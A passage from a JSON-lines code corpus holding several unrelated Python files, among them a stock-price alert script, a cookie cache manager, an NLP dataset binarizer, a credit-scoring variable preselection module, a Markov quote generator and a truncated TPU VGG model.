typing.Union:\n # A heterogeneous tuple: check each element if it subclasses the\n # union.\n result = all([subclass_of(elem, info_args[0]) for elem in cls_args])\n else:\n result = subclass_of(common_ancestor_of_types(*cls_args), info_args[0])\n elif len(cls_args) == len(info_args):\n for c1, c2 in zip(cls_args, info_args):\n if not subclass_of(c1, c2):\n break\n else:\n result = True\n return result\n\n\ndef _check_literal(obj: object, func: typing.Callable, *args: type) -> bool:\n # Instance or subclass check for Literal.\n literal = args[0]\n leftovers = args[1:]\n literal_args = getattr(literal, '__args__', None)\n if literal_args:\n literal_arg = literal_args[0]\n return obj == literal_arg and (not leftovers or func(obj, *leftovers))\n return False\n","sub_path":"Aula 10/Vendas/venv/Lib/site-packages/typish/functions/_subclass_of.py","file_name":"_subclass_of.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"145272095","text":"import vgg_intermediate\nimport torch.nn.functional as F\nimport torch.nn as nn\n\n\nclass ContentLoss(nn.Module):\n def __init__(self, content_image, layers):\n super(ContentLoss, self).__init__()\n self.vgg = vgg_intermediate.VGGIntermediate(requested=layers)\n target_features = self.vgg(content_image)\n self.target = target_features[19].detach()\n \n def forward(self, input):\n out = self.vgg(input)\n mse = 0\n self.loss = F.mse_loss(out[19], self.target)\n return self.loss","sub_path":"style_transfer/content_loss.py","file_name":"content_loss.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"480702388","text":"import win32api\nimport win32con\nimport os\nimport time\n\nclass win32Doc:\n _public_methods_ = ['write']\n def write(self,s):\n print(s)\n\nimport urllib\nimport urllib.error\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport gzip\nimport lxml\nimport sys\n\nclass login_web:\n\n eleName = [\"股票名字\",\"今日开盘价\",\"昨日收盘价\",\"当前价格\",\"今日最高价\",\"今日最低价\",\"竞买价\",\\\n\"竞卖价\",\"成交的股票数\",\"成交金额\",\"买一n\",\"买一p\",\"买二n\",\"买二p\",\"买三n\",\"买三p\",\"买四n\",\\\n\"买四p\",\"买五n\",\"买五p\",\"卖一n\",\"卖一p\",\"卖二n\",\"卖二p\",\"卖三n,\",\"卖三p\",\"卖四n\",\"卖四p\",\"卖五n\",\"卖五p\",\"日期\",\"时间\"]\n\n def __init__(self):\n '''设置头,cookie'''\n self.players = []\n self.opener = urllib.request.build_opener()\n user_agent = \"Mozilla/5.0 
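# --- editor's sketch ---
# typish's _subclass_of_generic above compares origin/args pairs element by
# element. The stdlib primitives it parallels, shown directly (typing.get_origin
# and typing.get_args, Python 3.8+; typish ships its own variants of these):
import typing

assert typing.get_origin(typing.List[int]) is list
assert typing.get_args(typing.List[int]) == (int,)
assert typing.get_origin(typing.Union[int, str]) is typing.Union
# element-wise argument check, as in _subclass_of_generic:
cls_args  = typing.get_args(typing.List[bool])
info_args = typing.get_args(typing.List[int])
assert all(issubclass(c, i) for c, i in zip(cls_args, info_args))  # bool <: int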
(Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101\"\n accept = \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\"\n connection = \"keep-alive\"\n host = \"10.189.37.35:7100\"\n upgrade = \"1\"\n headers = {'User-Agent': user_agent,\n 'Accept': accept,\n 'Connection': connection,\n 'Host': host,\n 'Upgrade-Insecure-Requests': upgrade,\n }\n header = []\n for key, value in headers.items():\n elem = (key, value)\n header.append(elem)\n print(header)\n self.opener.addheaders = header\n\n def ungzip(self, data):\n try: # 尝试解压\n data = gzip.decompress(data).decode()\n except:\n print('未经压缩, 无需解压')\n return data\n\n def getInfo(self,id):\n '''从people页面获得第一批用户信息,通过扫描关注列表,得到大量用户信息'''\n url = \"http://hq.sinajs.cn/list=\" + id\n try:\n request = urllib.request.Request(url)\n response = self.opener.open(url)\n html = response.read().decode('gb2312')\n #html = self.ungzip(html)\n #print(html)\n self.dealInfo(html)\n #soup = BeautifulSoup(html, 'lxml')\n except urllib.error.URLError as e:\n print(e.reason)\n print(\"有错误\")\n if hasattr(e, \"code\"):\n print(e.code)\n if hasattr(e, \"reason\"):\n print(e.reason)\n\n def dealInfo(self,info):\n if info:\n element = info.split(',')\n self.dic = {}\n i = 0\n for each in self.eleName:\n self.dic [each] = element[i]\n i += 1\n self.dic['股票名字'] = self.dic ['股票名字'].split('\"')[1]\nid = input(\"please input a number\\n\")\nhi_price = float(input(\"请输入你想要提醒的上限价格\\n\"))\nlo_price = float(input(\"请输入你想要提醒的下限价格\\n\"))\nlg = login_web()\nwhile True:\n lg.getInfo(id)\n print(lg.dic['股票名字']+':'+lg.dic['时间']+' : ' + lg.dic['当前价格'])\n if float(lg.dic['当前价格']) >= hi_price or float(lg.dic['当前价格']<=lo_price):\n win32api.MessageBox(0, str(lg.dic['当前价格'])+'价格已达到', \"注意啦\", win32con.MB_ICONWARNING)\n break\n time.sleep(5)\n\n","sub_path":"stockInfo.py","file_name":"stockInfo.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"159944515","text":"from Cookie import SimpleCookie\nfrom datetime import datetime\nimport re\nfrom urlparse import urlparse\n\n\nDEFAULT_COOKIE_KEY_PREFIX = 'cookie'\nORIGIN_COOKIE_KEY_PREFIX = 'origin'\nDEFAULT_COOKIE_MAX_AGE = 60 * 60 * 24 * 365 * 10 # 10 years\n\n\ndef _make_cookie(cookie_headers):\n def _add_dash(match_obj):\n return match_obj.group(0).replace(' ', '-')\n\n cookie = SimpleCookie()\n set_cookie_str = re.sub(r'\\d{2}\\s\\w+\\s\\d{4}', _add_dash, cookie_headers)\n cookie.load(set_cookie_str)\n\n return cookie\n\ndef get_max_age(cookie):\n max_age = None\n # convert expires to seconds, so we use take advantage of cache expiry feature,\n # no need to clear cookie ourselves\n if cookie['expires']:\n fmt = '%a, %d-%b-%Y %H:%M:%S GMT'\n try:\n expired = datetime.strptime(cookie['expires'], fmt)\n now = datetime.utcnow()\n max_age = (expired - now).total_seconds()\n except ValueError:\n # if cookie has wrong date format we ignore the expires\n cookie['expires'] = ''\n max_age = None\n\n # max-age has higher priority than expires\n if cookie['max-age']:\n max_age = int(cookie['max-age'])\n return max_age if max_age is not None else DEFAULT_COOKIE_MAX_AGE\n\ndef is_domain_valid(domain):\n if domain.endswith('.'):\n return False\n else:\n return True\n\ndef normalize_domain(domain):\n return domain.lstrip('.')\n\n# Not used\n#def normalize_path(path):\n# return path.rstip('/') if path != '/' else path\n\n\nclass CookieManager(object):\n\n def __init__(self, cache, key_prefix=''):\n self.key_prefix = '.'.join([key_prefix, 
DEFAULT_COOKIE_KEY_PREFIX])\n self.cache = cache\n\n def process_request(self, request):\n \"\"\"\n Set 'Cookie' header in request\n \"\"\"\n if self.cache is None:\n return\n\n for key, value in self.get_cookies(request.url).items():\n request.cookies.setdefault(key, value)\n\n def process_response(self, request, response):\n \"\"\"\n Process 'Set-Cookie' header in response\n \"\"\"\n if self.cache is None:\n return\n\n if response and response.has_header('Set-Cookie'):\n origin = urlparse(response.url).netloc\n cookies = _make_cookie(response.headers['Set-Cookie'])\n for name, cookie in cookies.items():\n domain = cookie['domain']\n if not domain:\n self.set_origin_cookie(origin, cookie)\n else:\n self.set_domain_cookie(cookie)\n\n def get_domain_cookie_key(self, domain, path, name):\n return '.'.join([self.key_prefix, normalize_domain(domain), path, name])\n\n def get_domain_cookie_lookup_key(self, domain):\n return '.'.join([self.key_prefix, normalize_domain(domain)])\n\n def get_origin_cookie_key(self, origin, path, name):\n return '.'.join([self.key_prefix, ORIGIN_COOKIE_KEY_PREFIX, normalize_domain(origin), path, name])\n\n def get_origin_cookie_lookup_key(self, origin):\n return '.'.join([self.key_prefix, ORIGIN_COOKIE_KEY_PREFIX, normalize_domain(origin)])\n\n def get_cookies(self, url):\n \"\"\"\n Return a dictionary (key:value) of cookies for the given URL\n \"\"\"\n domain = urlparse(url).netloc\n domain_parts = domain.split('.')\n path = urlparse(url).path\n cookies = self.get_origin_cookies(domain, path)\n for i in reversed(range(len(domain_parts))):\n d = '.'.join(domain_parts[i:])\n c = self.get_domain_cookies(d, path)\n cookies.update(c)\n return cookies\n\n def get_domain_cookies(self, domain, path):\n \"\"\"\n Return a dictionary (key:value) of domain cookies\n \"\"\"\n return self.get_xxx_cookies(self.get_domain_cookie_lookup_key, domain, path)\n\n def get_origin_cookies(self, domain, path):\n \"\"\"\n Return a dictionary (key:value) of origin cookies\n \"\"\"\n return self.get_xxx_cookies(self.get_origin_cookie_lookup_key, domain, path)\n\n def get_xxx_cookies(self, get_lookup_key_fn, domain, path):\n \"\"\"\n Return a dictionary (key:value) of xxx cookies\n \"\"\"\n lookup_key = get_lookup_key_fn(domain)\n cookie_keys_set = self.cache.get(lookup_key) or set()\n cookies = {}\n expired_cookie_keys_set = set()\n if cookie_keys_set:\n for cookie_key in cookie_keys_set:\n cookie = self.cache.get(cookie_key)\n if cookie:\n if self._path_ok(cookie, path):\n cookies[cookie.key] = cookie.value\n else:\n expired_cookie_keys_set.add(cookie_key)\n self.cache.set(lookup_key, cookie_keys_set.difference(expired_cookie_keys_set))\n return cookies\n\n def _path_ok(self, cookie, url):\n if not cookie['path']:\n return True\n\n if cookie['path'] and cookie['path'] == '/':\n return True\n request_path = urlparse(url).path\n\n # This never happens in real system. request_path always starts with /.\n# if not request_path.startswith('/'):\n# request_path = '/' + request_path\n\n if request_path == cookie['path']:\n return True\n elif cookie['path'].endswith('/') and request_path.startswith(cookie['path'][:-1]):\n return True\n elif request_path.startswith(cookie['path']) and request_path[len(cookie['path'])] == '/':\n return True\n else:\n return False\n\n def set_domain_cookie(self, cookie):\n \"\"\"\n Set domain cookie (i.e. 
cookie that has Domain attribute) in cache.\n \"\"\"\n domain = cookie['domain']\n if not is_domain_valid(domain):\n return\n\n max_age = get_max_age(cookie)\n name = cookie.key\n path = cookie['path']\n\n cookie_key = self.get_domain_cookie_key(domain, path, name)\n lookup_key = self.get_domain_cookie_lookup_key(domain)\n self.cache.set(cookie_key, cookie, max_age)\n\n cookie_keys_set = self.cache.get(lookup_key) or set()\n cookie_keys_set.add(cookie_key)\n self.cache.set(lookup_key, cookie_keys_set, DEFAULT_COOKIE_MAX_AGE)\n\n def set_origin_cookie(self, origin, cookie):\n \"\"\"\n Set origin cookie (i.e. cookie that does not have Domain attribute) in cache.\n \"\"\"\n max_age = get_max_age(cookie)\n name = cookie.key\n path = cookie['path']\n\n cookie_key = self.get_origin_cookie_key(origin, path, name)\n lookup_key = self.get_origin_cookie_lookup_key(origin)\n self.cache.set(cookie_key, cookie, max_age)\n\n cookie_keys_set = self.cache.get(lookup_key) or set()\n cookie_keys_set.add(cookie_key)\n self.cache.set(lookup_key, cookie_keys_set, DEFAULT_COOKIE_MAX_AGE)","sub_path":"dogbutler/cookie.py","file_name":"cookie.py","file_ext":"py","file_size_in_byte":6901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"418455233","text":"from typing import Dict\nimport os\nimport shutil\nfrom multiprocessing import Pool\nfrom ncc import tasks\nfrom collections import Counter\nfrom ncc.data import (\n Dictionary,\n indexed_dataset,\n)\nfrom ncc.tokenizers import tokenization\nfrom ncc.data.tools.binarizer import Binarizer\nfrom ncc.utils.file_ops.yaml_io import load_yaml\nfrom ncc import LOGGER\n\nfrom ncc.utils.file_ops import json_io\n\n\ndef binarize(args: Dict, filename: str, vocab: Dictionary, in_file: str,\n offset: int, end: int, append_eos: bool = True):\n \"\"\"binarize function for multi-processing\"\"\"\n ds_file = '{}.mmap'.format(in_file)\n ds = indexed_dataset.make_builder(ds_file, impl=args['preprocess']['dataset_impl'], vocab_size=len(vocab))\n\n def consumer(tensor):\n ds.add_item(tensor)\n\n res = Binarizer.binarize(filename, vocab, consumer, tokenize=tokenization.json_tokenizer,\n append_eos=append_eos, offset=offset, end=end)\n ds.finalize('{}.idx'.format(in_file))\n return res\n\n\ndef main(args):\n task = tasks.get_task(args['preprocess']['task'])\n LOGGER.info('mkdir {} for {} task'.format(args['preprocess']['destdir'], args['preprocess']['task']))\n os.makedirs(args['preprocess']['destdir'], exist_ok=True)\n\n def train_path(lang):\n return \"{}{}\".format(args['preprocess']['trainpref'], (\".\" + lang) if lang else \"\")\n\n def valid_path(lang):\n return \"{}{}\".format(args['preprocess']['validpref'], (\".\" + lang) if lang else \"\")\n\n def file_name(prefix, lang):\n fname = prefix\n if lang is not None:\n fname += \".{lang}\".format(lang=lang)\n return fname\n\n def dest_path(prefix, lang):\n return os.path.join(args['preprocess']['destdir'], file_name(prefix, lang))\n\n def dict_path(lang):\n return dest_path(lang, \"dict\") + \".jsonl\"\n\n target = not args['preprocess']['only_source']\n\n from dataset.codexglue.code_to_text import BPE_DIR\n\n source_dict_file = os.path.join(BPE_DIR, 'csn/csn.spm.vocab')\n target_dict_file = os.path.join(os.path.dirname(args['preprocess']['destdir']), 'dict.jsonl')\n with open(source_dict_file, 'r') as reader, open(target_dict_file, 'w') as writer:\n for line in reader:\n print(json_io.json_dumps([line.split('\\t')[0], 100]), file=writer)\n src_dict = tgt_dict = 
task.load_dictionary(target_dict_file)\n\n src_dict.save(dict_path(args['preprocess']['source_lang'])) # save spm dict to ncc.dictionary\n if target and tgt_dict is not None:\n tgt_dict.save(dict_path(args['preprocess']['target_lang']))\n\n # 2. ***************build dataset********************\n def make_binary_dataset(vocab: Dictionary, input_file, output_file, num_workers: int):\n \"\"\"make binary dataset\"\"\"\n # LOGGER.info(\"[{}] Dictionary: {} types\".format(attr, len(vocab) - 1))\n n_seq_tok = [0, 0]\n replaced = Counter() # save un-recorded tokens\n\n def merge_result(worker_result):\n replaced.update(worker_result[\"replaced\"])\n n_seq_tok[0] += worker_result[\"nseq\"]\n n_seq_tok[1] += worker_result[\"ntok\"]\n\n # split a file into different parts\n # if use multi-processing, we first process 2nd to last file\n # 1.txt -> 10 processor, 0(p0)(0-99), 100(p1)(100-199), ...\n offsets = Binarizer.find_offsets(input_file, num_workers)\n pool = None\n if num_workers > 1:\n # p1-pN -> (1 bin-txt, 1 idx), (N bin-txt, N idx)\n pool = Pool(processes=num_workers - 1)\n for worker_id in range(1, num_workers):\n prefix = \"{}{}\".format(output_file, worker_id)\n pool.apply_async(\n binarize,\n (\n args,\n input_file,\n vocab,\n prefix,\n offsets[worker_id],\n offsets[worker_id + 1]\n ),\n callback=merge_result\n )\n pool.close()\n # process 1th file, if multi-processing available. If not, process all file\n # p0 -> 0,end\n ds_file = '{}.mmap'.format(output_file)\n ds = indexed_dataset.make_builder(ds_file, impl=args['preprocess']['dataset_impl'], vocab_size=len(vocab))\n merge_result(\n Binarizer.binarize(\n input_file, vocab, lambda t: ds.add_item(t),\n tokenize=tokenization.json_tokenizer, offset=0, end=offsets[1], append_eos=True,\n )\n )\n if num_workers > 1:\n # p1-pN\n pool.join()\n # merge sub-processors' index and data files into final files and delete them.\n for worker_id in range(1, num_workers):\n temp_file_path = \"{}{}\".format(output_file, worker_id)\n ds.merge_file_(temp_file_path)\n # idx, txt\n os.remove(indexed_dataset.data_file_path(temp_file_path))\n os.remove(indexed_dataset.index_file_path(temp_file_path))\n ds.finalize('{}.idx'.format(output_file))\n\n LOGGER.info(\n \"{}: {} sents, {} tokens, {:.3}% replaced by {}\".format(\n # attr,\n input_file,\n n_seq_tok[0],\n n_seq_tok[1],\n 100 * sum(replaced.values()) / n_seq_tok[1],\n vocab.unk_word,\n )\n )\n\n def make_dataset(vocab, input_prefix, output_prefix, lang, num_workers=1):\n if args['preprocess']['dataset_impl'] == \"raw\":\n in_file = file_name(input_prefix, lang)\n out_dir = args['preprocess']['destdir']\n os.makedirs(out_dir, exist_ok=True)\n LOGGER.info('Copying {} into {}'.format(in_file, out_dir))\n shutil.copy(src=in_file, dst=args['preprocess']['destdir'])\n else:\n in_file = file_name(input_prefix, lang)\n out_file = dest_path(output_prefix, lang)\n os.makedirs(os.path.dirname(out_file), exist_ok=True)\n make_binary_dataset(vocab, in_file, out_file, num_workers)\n\n def make_all(lang, vocab):\n if args['preprocess']['trainpref']:\n make_dataset(vocab, args['preprocess']['trainpref'], \"train\", lang,\n num_workers=args['preprocess']['workers'])\n if args['preprocess']['validpref']:\n for k, validpref in enumerate(args['preprocess']['validpref'].split(\",\")):\n outprefix = \"valid{}\".format(k) if k > 0 else \"valid\"\n make_dataset(vocab, validpref, outprefix, lang, num_workers=args['preprocess']['workers'])\n if args['preprocess']['testpref']:\n for k, testpref in 
enumerate(args['preprocess']['testpref'].split(\",\")):\n outprefix = \"test{}\".format(k) if k > 0 else \"test\"\n make_dataset(vocab, testpref, outprefix, lang, num_workers=args['preprocess']['workers'])\n\n make_all(args['preprocess']['source_lang'], src_dict)\n if target:\n make_all(args['preprocess']['target_lang'], tgt_dict)\n\n\ndef cli_main():\n import argparse\n parser = argparse.ArgumentParser(\n description=\"Downloading/Decompressing CodeSearchNet dataset(s) or Tree-Sitter Library(ies)\")\n parser.add_argument(\n \"--yaml_file\", \"-f\", type=str, help=\"load {yaml_file}.yml for train\",\n default='config/ruby'\n )\n args = parser.parse_args()\n LOGGER.info(args)\n yaml_file = os.path.join(os.path.dirname(__file__), '{}.yml'.format(args.yaml_file))\n LOGGER.info('Load arguments in {}'.format(yaml_file))\n args = load_yaml(yaml_file)\n LOGGER.info(args)\n main(args)\n\n\nif __name__ == \"__main__\":\n cli_main()\n","sub_path":"dataset/codexglue/code_to_text/codebart/preprocess_codebart.py","file_name":"preprocess_codebart.py","file_ext":"py","file_size_in_byte":7735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"32825827","text":"#! /usr/bin/env python\n\nimport numpy as np\nimport pandas as pd\nfrom pandas import DataFrame, Series\nimport time\nimport sys\nimport os\nimport math\nfrom LogProc import *\nsys.path.append(r'/Users/shenzhouyang/mycode/数据测试/code/LR/libraries')\nfrom varclushi import VarClusHi\nimport statsmodels.api as sm\n\ndef preselection(df, modeling_weight, var_clus_cat, target_var, var_info_df, forced_var_list, exclude_var_list, min_iv, max_iv, preselect_var_num, tgt_dr):\n\tlog_file, lst_file = AppendLogs()\n\tfor x in log_file, lst_file:\n\t\tprint('\\n', file = x)\n\t\n\t\n\tvar_info_df['force_ind'] = var_info_df.apply(var_check, axis = 1, check_lst = forced_var_list)\n\tvar_info_df['exclude_ind'] = var_info_df.apply(var_check, axis = 1, check_lst = exclude_var_list)\n\t\n\tvar_candidate_df = var_info_df[(var_info_df['force_ind'] == 0) & (var_info_df['exclude_ind'] == 0)]\n\t\n\t\n\t#VarClus Selection\n\tclustering_sel_var_df = varclus(df_in = df, var_df = var_candidate_df, var_clus_cat = var_clus_cat)\n\tclustering_sel_var_df.to_csv(tgt_dr + '/varclus_selected_vars.csv', index = False)\n\tprint('{0} variables after clustering.'.format(len(clustering_sel_var_df)), file = log_file)\n\t\n\t#Backward Selection\n\t#clustering_sel_var_df = pd.read_csv(tgt_dr + '/varclus_selected_vars.csv')\n\tvar_lst = list(clustering_sel_var_df['woe'])\n\t\n\tvar_lst_preselection = lr_backward(df, target_var, var_lst, preselect_var_num, log = log_file, lst = lst_file)\n\tprint('{0} variables after backward.'.format(len(var_lst_preselection)), file = log_file)\n\t\n\t#Retrieve forced variables\n\tvar_lst_preselection += list(var_info_df[var_info_df['force_ind'] == 1]['woe'])\n\t\n\tvar_info_df[var_info_df['woe'].isin(var_lst_preselection)].to_csv(tgt_dr + '/preselected_vars.csv', index = False)\n\t\n\t\ndef lr_backward(df_in, target_var, candidate_var_lst, var_cnt_max, **kargs):\n\tcurrent_var_lst = candidate_var_lst.copy()\n\tstep = 1\n\twhile len(current_var_lst) > var_cnt_max:\n\t\tprint('Step {0}, {1} variables in total(target is {2})'.format(step, len(current_var_lst), var_cnt_max), file = kargs['log'])\n\t\tX = df_in[current_var_lst]\n\t\tX.insert(0, 'Intercept', 1)\n\t\tmodel = sm.OLS(df_in[[target_var]], X).fit()\n\t\tprint('Step {0}:'.format(step), file = kargs['lst'])\n\t\tprint(model.summary(), file = 
kargs['lst'])\n\t\t# use all coefs except intercept\n\t\tpv_series = model.pvalues.iloc[1:]\n\t\tpv_series.sort_values(ascending = False, inplace = True)\n\t\tcurrent_var_lst.remove(pv_series.index[0])\n\t\tfor f in kargs.values():\n\t\t\tprint('\\n{0} (p-value: {1}) is removed.\\n'.format(pv_series.index[0], pv_series[0]), file = f)\n\t\tstep += 1\n\t\n\treturn current_var_lst\n\t\t\n\ndef top(df, n, column):\n\treturn df.sort_values(by = column, ascending = False)[:n]\n\ndef var_check(df, check_lst):\n\n\tif df['varname'] in check_lst or df['woe'] in check_lst:\n\t\treturn 1\n\telse:\n\t\treturn 0\n\t\t\n\ndef varclus(df_in, var_df, var_clus_cat):\n\t\n\tclustering_sel_var_df = pd.DataFrame([])\n\t\n\tfor cluster in var_clus_cat:\n\t\t\n\t\tvar_lst = list(var_df[var_df['label'] == cluster]['woe'])\n\t\t\n\t\tprint('Processing Clustering for {0} variables for {1}...'.format(len(var_lst), cluster))\n\t\t\n\t\tdev_vc = VarClusHi(df_in[var_lst],maxeigval2 = 0.7, maxclus = None)\n\t\tdev_vc.varclus()\n\t\tdev_cluster_result = pd.merge(dev_vc.rsquare[['Cluster', 'Variable']], var_df[['woe', 'IV_dev']], left_on = 'Variable', right_on = 'woe', how = 'left')\n\t\t\n\t\tdev_cluster_result.sort_values(by = ['Cluster', 'IV_dev'], ascending = [True, False], inplace = True)\n\t\t\n\t\tdev_cluster_result = dev_cluster_result.groupby('Cluster', as_index = False).apply(top, n = 1,column='IV_dev')\t\n\t\tdev_cluster_result = dev_cluster_result[['woe']]\n\t\t\n\t\tclustering_sel_var_df = pd.concat([clustering_sel_var_df, dev_cluster_result])\n\t\n\tclustering_sel_var_df = clustering_sel_var_df.merge(var_df, on = 'woe', how = 'left')\n\t\n\t#Keep all the other categories that are not in the clustering category list\n\tfiltered_vars_other_df = var_df[~var_df['label'].isin(var_clus_cat)]\n\t\n\tclustering_sel_var_df = pd.concat([clustering_sel_var_df, filtered_vars_other_df])\n\t\n\tclustering_sel_var_df.index = range(len(clustering_sel_var_df))\n\t\n\treturn clustering_sel_var_df\n\t\n\n\n","sub_path":"LR/libraries/WoEPreselection.py","file_name":"WoEPreselection.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"640077486","text":"import sys\nimport re\nimport json\nimport requests\nimport textwrap\nfrom typing import List, Set, Dict, Callable\nfrom argparse import ArgumentParser\nfrom random import choice\n\n\ndef sanitize_quote(quote: str) -> str:\n # Strip HTML tags\n quote = re.sub(r'<.*?>', '', quote) # type: str\n\n # Replace HTML entities\n replace = {\n '’': '\\'',\n '‘': '\\'',\n '“': '\\\"',\n '”': '\\\"',\n '″': '\\\"',\n '–': '-',\n '—': '-',\n '…': '...',\n '&': '&',\n\n # also remove these\n '\\n': '',\n '\\r': ''\n }\n for c in replace:\n quote = quote.replace(c, replace[c])\n\n # Strip leading and trailing whitespaces\n return quote.strip()\n\n\nclass SourceAPI:\n def fetch_quotes(self, n: int, batch_size: int) -> List[str]:\n raise NotImplementedError\n\n\nclass QuotesOnDesignAPI(SourceAPI):\n def __init__(self):\n self.__url = 'http://quotesondesign.com/wp-json/posts'\n\n def fetch_quotes(self, n: int, batch_size: int) -> List[str]:\n params = {\n 'filter[orderby]': 'rand',\n 'filter[posts_per_page]': batch_size\n }\n\n # Make this a set so there are no duplicates\n quotes = set() # type: Set[str]\n\n while len(quotes) < n:\n response = requests.get(url=self.__url, params=params)\n if response.ok:\n for q in json.loads(response.text):\n quotes.add(sanitize_quote(q['content']))\n if 
len(quotes) >= n:\n break\n\n print('Fetched %d/%d quotes.' % (len(quotes), n))\n else:\n print('Error fetching quotes.')\n exit(1)\n\n return list(quotes)\n\n\nclass DeszczowceAPI(SourceAPI):\n def __init__(self):\n self.__url = 'http://www.deszczowce.pl/skrypty/losowy_cytat.php'\n\n def fetch_quotes(self, n: int, batch_size: int) -> List[str]:\n print(\"NOTE: Deszczowce API doesn't support fetching in batches. Consider fetching small amounts of quotes.\")\n\n quotes = set() # type: Set[str]\n for i in range(n):\n response = requests.get(url=self.__url)\n if response.ok:\n content = response.content.decode('iso-8859-2')\n match = re.search(r'(.*?)\"', content)\n if match:\n quote = match.groups()[0][1:] # type: str\n quotes.add(quote)\n print('Fetched %d/%d quotes.' % (i + 1, n))\n else:\n print('Error fetching quotes.')\n exit(1)\n\n return list(quotes)\n\n\nclass Generator:\n def __init__(self, dataset: List[str], ngram_len: int):\n self.__dataset = dataset\n self.__ngram_len = ngram_len\n self.__ngrams = {} # type: Dict[str, Dict[str, int]]\n\n for s in dataset:\n for start in range(0, len(s) - ngram_len + 1):\n\n # Get a slice of the string as the ngram\n gram = s[start:start + ngram_len]\n if gram not in self.__ngrams:\n self.__ngrams[gram] = {}\n\n # Find what character comes after the ngram\n next_char = ''\n if start + ngram_len < len(s):\n next_char = s[start + ngram_len]\n\n # Increment the probability of that character appearing after the ngram\n if next_char in self.__ngrams[gram]:\n self.__ngrams[gram][next_char] += 1\n else:\n self.__ngrams[gram][next_char] = 1\n\n def generate(self) -> str:\n\n # Choose the start of a random quote in the dataset as the first ngram\n current = choice(self.__dataset)[0:self.__ngram_len] # type: str\n result = current\n\n running = True\n while running:\n pool = [] # type: List[str]\n for char, times in self.__ngrams[current].items():\n pool += [char] * times\n\n next_char = choice(pool)\n if next_char == '':\n running = False\n else:\n result += next_char\n current = result[len(result) - self.__ngram_len:]\n\n return result\n\n\nif __name__ == '__main__':\n\n # Dataset source APIs\n sources = {\n 'quotesondesign': QuotesOnDesignAPI(),\n 'deszczowce': DeszczowceAPI()\n }\n\n # Parse options\n parser = ArgumentParser(description='Generates quotes.')\n\n parser.add_argument('--dataset-source', '-s', dest='dataset_source', default='quotesondesign', choices=sources.keys(),\n help='the API to use to fetch the source dataset')\n\n parser.add_argument('--dataset-size', '-n', dest='dataset_size', default=200, type=int,\n help='how many quotes to fetch from the API to use as the source dataset')\n\n parser.add_argument('--dataset-batch-size', '-b', dest='batch_size', default=40, type=int,\n help='how many quotes to fetch in a single request')\n\n parser.add_argument('--ngram-length', '-g', dest='ngram_length', default=5, type=int,\n help='length of ngrams to use for the Markov chain')\n\n args = parser.parse_args()\n\n # Generate & print\n print('Fetching dataset...')\n source = sources[args.dataset_source]\n quotes = source.fetch_quotes(args.dataset_size, args.batch_size)\n quote = Generator(quotes, args.ngram_length).generate()\n\n wrapped = '\\n\\t '.join(textwrap.wrap(quote, 80))\n print('\\n\\t\"%s\"\\n' % wrapped)\n","sub_path":"quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":5687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"304884306","text":"#!/usr/bin/env 
python\n\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\nfrom vaspwfc import vaspwfc\nfrom paw import nonlq, nonlr\nfrom spinorb import read_cproj_NormalCar\n\nimport numpy as np\nfrom ase.io import read, write\n\ncprojs = read_cproj_NormalCar()\ncprojs.shape = (3, 16, 34)\niband = 10\nikpt = 1\ncc = cprojs[ikpt-1, iband-1]\n\nposcar = read('POSCAR')\nwfc = vaspwfc()\n\ncptwf = wfc.readBandCoeff(iband=iband, ikpt=ikpt)\np1 = nonlq(poscar, wfc._encut, k=wfc._kvecs[ikpt-1])\n\nILM = [(i, l, m) for i, it in zip([0, 1, 2], [0, 1, 1])\n for l in p1.pawpp[it].proj_l\n for m in range(-l, l+1)]\n\n\nimport time\nt0 = time.time()\nbeta = p1.proj(cptwf)\nt1 = time.time()\nprint(t1 - t0)\n\nfigure = plt.figure(figsize=(4,4))\nax = plt.subplot()\nax.set_aspect('equal')\n\nax.plot([0, np.abs(cc).max()], [0, np.abs(cc).max()], ':', lw=1.5, alpha=0.6)\nax.plot(np.abs(beta), np.abs(cc), 'bd', alpha=0.6, ms=5)\n# ax.plot(beta.imag, cc.imag, 'bd', alpha=0.6, ms=5)\n\nfor ilm, x, y in zip(ILM, np.abs(beta), np.abs(cc)):\n ax.text(x, y, \"({},{},{})\".format(*ilm),\n ha=\"center\",\n va=\"center\",\n fontsize='small',\n # family='monospace',\n # fontweight='bold'\n transform=ax.transData,\n # bbox=dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n )\n\nax.set_title(\"Reciprocal Space Projectors\")\nax.set_xlabel('My script', labelpad=5)\nax.set_ylabel('VASP NormalCar', labelpad=5)\n\nplt.tight_layout()\nplt.savefig('kaka.png', dpi=360)\nplt.show()\n","sub_path":"examples/projectors/lreal_false/kaka.py","file_name":"kaka.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"481792734","text":"from math import sqrt\nimport numpy as np\nfrom fathom.imagenet.imagenet_cp import *\nfrom fathom.nn import *\nimport tensorflow as tf\nfrom tensorflow.contrib.tpu.python.tpu import tpu_config\nfrom tensorflow.contrib.tpu.python.tpu import tpu_estimator\nfrom tensorflow.contrib.tpu.python.tpu import tpu_optimizer\nimport time\n\ndef model_fn(features, labels, mode, params):\n del params # Unused.\n\n if mode != tf.estimator.ModeKeys.TRAIN:\n raise RuntimeError(\"mode {} is not supported yet\".format(mode))\n\n # Convolution and pooling layers.\n input_layer = features\n # block 1 -- outputs 112x112x64\n conv1_1 = tf.layers.conv2d(\n inputs=input_layer,\n filters=64,\n kernel_size=3,\n 